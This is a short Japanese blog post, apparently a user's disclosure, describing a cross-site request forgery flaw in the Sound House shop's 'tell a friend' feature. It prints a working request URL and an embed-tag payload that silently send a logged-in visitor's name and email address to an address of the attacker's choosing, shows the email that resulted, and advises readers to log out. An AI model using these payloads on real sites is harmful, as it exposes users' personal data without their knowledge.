方法

サウンドハウスにログインしている状態で以下のURLを踏むと、「ToAddr=」宛に自分の氏名・メールアドレスが送信される。

http://www.soundhouse.co.jp/shop/TellaFriendSend.asp?ToAddr=xxx@gmail.com&Message=test&x=87&y=13&Item=1230%5E578603&Message1=

このURLを踏まなければ問題ないように思えるが、embed要素で悪意のあるサイトに埋め込んだら？

<embed src="http://www.soundhouse.co.jp/shop/TellaFriendSend.asp?ToAddr=xxx@gmail.com&Message=test&x=87&y=13&Item=1230%5E578603&Message1=" width="88" height="31">

試しにHTMLに埋め込んで表示してみると。こんなメールが届いた。

件名：○○○○　様から、お勧めメールが届いています
差出人：メールアドレス
本文：

test

ご案内致しました内容につきまして不明な点がございましたら、
弊社営業までご連絡頂きますようお願い致します。

”WEBシステム構成の再設計”を実行したらしいけど、どうも信用できないよサウンドハウス。

サウンドハウスのサイトを閉じる前には必ずログアウトを行うこと。

ちなみにembed要素はFirefoxにも対応してますよ。
プラグインの追加が表示されますが、バックグラウンドではsrc属性が展開されています。。。